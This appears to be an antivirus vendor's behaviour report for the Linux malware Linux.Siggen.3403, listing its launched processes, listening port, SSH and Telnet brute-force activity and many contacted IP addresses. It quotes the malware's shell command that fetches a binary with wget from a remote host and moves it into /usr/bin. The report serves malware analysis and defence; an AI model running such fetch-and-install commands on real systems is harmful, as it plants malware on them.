Linux.Siggen.3403

Technical Information

Malicious functions:

Launches processes:

sh -c JellySSH
sh -c cd /tmp;wget http://192.168.0.2:8081/mipsapp/JellySSH;mv /tmp/JellySSH /usr/bin/JellySSH
wget http://192.168.0.2:8081/mipsapp/JellySSH

Network activity:

Awaits incoming connections on ports:

0.0.0.0:7331

Establishes connection:

127.0.0.1:7331
1.#.1.1:53
19#.##8.0.2:8081

Attacks using a special dictionary (brute-force technique) via the SSH protocol

Attacks using a special dictionary (brute-force technique) via the Telnet protocol.

Sends data to the following servers:

19#.##8.200.4:80
19#.##8.200.3:80
19#.##8.200.2:80
<LOCAL_GATE>:80
19#.##8.200.6:80
19#.##8.200.7:80
19#.##8.200.8:80
19#.##8.200.9:80
<LOCAL_GATE>0:80
<LOCAL_GATE>3:80
19#.##8.200.5:80
<LOCAL_GATE>4:80
<LOCAL_GATE>6:80
<LOCAL_GATE>1:80
<LOCAL_GATE>2:80
<LOCAL_GATE>5:80
<LOCAL_GATE>8:80
<LOCAL_GATE>9:80
19#.##8.200.21:80
19#.##8.200.26:80
19#.##8.200.23:80
<LOCAL_GATE>7:80
19#.##8.200.20:80
19#.##8.200.24:80
19#.##8.200.22:80
19#.##8.200.25:80
19#.##8.200.2:8080
19#.##8.200.6:8080
19#.##8.200.8:8080
<LOCAL_GATE>:8080
<LOCAL_GATE>3:8080
<LOCAL_GATE>4:8080
<LOCAL_GATE>5:8080
<LOCAL_GATE>6:8080
19#.##8.200.3:8080
19#.##8.200.5:8080
19#.##8.200.7:8080
19#.##8.200.21:8080
<LOCAL_GATE>9:8080
19#.##8.200.20:8080
19#.##8.200.24:8080
19#.##8.200.26:8080
19#.##8.200.9:8080
<LOCAL_GATE>2:8080
19#.##8.200.25:8080
19#.##8.200.23:8080
<LOCAL_GATE>0:8080
<LOCAL_GATE>1:8080
<LOCAL_GATE>8:8080
<LOCAL_GATE>7:8080
19#.##8.200.22:8080
19#.##8.200.4:8080
19#.##8.200.27:80
19#.##8.200.28:80
19#.##8.200.29:80
19#.##8.200.33:80
19#.##8.200.30:80
19#.##8.200.34:80
19#.##8.200.31:80
19#.##8.200.32:80
19#.##8.200.36:80
19#.##8.200.38:80
19#.##8.200.35:80
19#.##8.200.37:80
19#.##8.200.40:80
19#.##8.200.39:80
19#.##8.200.34:8080
19#.##8.200.32:8080
19#.##8.200.33:8080
19#.##8.200.30:8080
19#.##8.200.27:8080
19#.##8.200.28:8080
19#.##8.200.29:8080
19#.##8.200.31:8080
19#.##8.200.36:8080
19#.##8.200.39:8080
19#.##8.200.37:8080
19#.##8.200.38:8080
19#.##8.200.35:8080
19#.##8.200.40:8080
19#.##8.200.44:80
19#.##8.200.43:80
19#.##8.200.41:80
19#.##8.200.42:80
19#.##8.200.45:80
19#.##8.200.46:80
19#.##8.200.48:80
19#.##8.200.49:80
19#.##8.200.50:80
19#.##8.200.47:80
19#.##8.200.53:80
19#.##8.200.54:80
19#.##8.200.52:80
19#.##8.200.51:80
19#.##8.200.44:8080
19#.##8.200.47:8080
19#.##8.200.46:8080
19#.##8.200.43:8080
19#.##8.200.51:8080
19#.##8.200.42:8080
19#.##8.200.48:8080
19#.##8.200.45:8080
19#.##8.200.53:8080
19#.##8.200.54:8080
19#.##8.200.50:8080
19#.##8.200.52:8080
19#.##8.200.49:8080
19#.##8.200.41:8080
19#.##8.200.56:80
19#.##8.200.58:80
19#.##8.200.55:80
19#.##8.200.57:80
19#.##8.200.61:80
19#.##8.200.63:80
19#.##8.200.60:80
19#.##8.200.59:80
19#.##8.200.64:80
19#.##8.200.66:80
19#.##8.200.67:80
19#.##8.200.68:80
19#.##8.200.62:80
19#.##8.200.65:80
19#.##8.200.55:8080
19#.##8.200.58:8080
19#.##8.200.56:8080
19#.##8.200.57:8080
19#.##8.200.61:8080
19#.##8.200.64:8080
19#.##8.200.60:8080
19#.##8.200.67:8080
19#.##8.200.68:8080
19#.##8.200.65:8080
19#.##8.200.63:8080
19#.##8.200.66:8080
19#.##8.200.62:8080
19#.##8.200.59:8080
19#.##8.200.70:80
19#.##8.200.69:80
19#.##8.200.72:80
19#.##8.200.71:80
19#.##8.200.74:80
19#.##8.200.73:80
19#.##8.200.76:80
19#.##8.200.80:80
19#.##8.200.75:80
19#.##8.200.77:80
19#.##8.200.78:80
19#.##8.200.79:80
19#.##8.200.81:80
19#.##8.200.82:80
19#.##8.200.69:8080
19#.##8.200.71:8080
19#.##8.200.76:8080
19#.##8.200.72:8080
19#.##8.200.70:8080
19#.##8.200.73:8080
19#.##8.200.74:8080
19#.##8.200.82:8080
19#.##8.200.78:8080
19#.##8.200.77:8080
19#.##8.200.81:8080
19#.##8.200.75:8080
19#.##8.200.79:8080
19#.##8.200.80:8080
19#.##8.200.72:22
19#.##8.200.70:22

Technologies

Terminology

Training and education

Myths

Technical Information

Curing recommendations